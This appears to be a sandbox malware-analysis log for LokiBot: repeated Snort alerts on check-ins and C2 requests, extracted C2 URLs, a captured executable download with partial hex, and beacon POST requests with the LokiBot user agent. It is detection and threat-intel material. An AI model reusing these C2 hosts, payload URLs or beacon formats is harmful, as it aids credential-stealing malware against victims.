Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49195
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49196
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49198
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49199
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49200
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49201
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49203
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49204
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49205
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49207
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49209
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49210
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49211
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49212
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49214
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49215
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49216
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49217
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49219
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49221
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49222
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49224
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49225
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49226
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49227
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49228
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49230
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Jul 2023 06:02:40 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Sun, 16 Jul 2023 23:20:35 GMTETag: "4e600-600a2eddd1688"Accept-Ranges: bytesContent-Length: 321024Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 64 b2 47 63 05 dc 14 63 05 dc 14 63 05 dc 14 7d 57 49 14 72 05 dc 14 7d 57 58 14 53 05 dc 14 7d 57 5f 14 0b 05 dc 14 44 c3 a7 14 66 05 dc 14 63 05 dd 14 e0 05 dc 14 7d 57 56 14 62 05 dc 14 7d 57 48 14 62 05 dc 14 7d 57 4d 14 62 05 dc 14 52 69 63 68 63 05 dc 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 91 b2 28 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 1c 02 00 00 66 17 00 00 00 00 00 db 47 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 19 00 00 04 00 00 74 9b 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 20 02 00 3c 00 00 00 00 f0 16 00 f8 83 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 19 00 9c 0a 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 2f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 1a 02 00 00 10 00 00 00 1c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 dc b6 14 00 00 30 02 00 00 18 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 83 02 00 00 f0 16 00 00 84 02 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 28 00 00 00 80 19 00 00 2a 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /Desktop/dwmfs.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.252.179.165Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
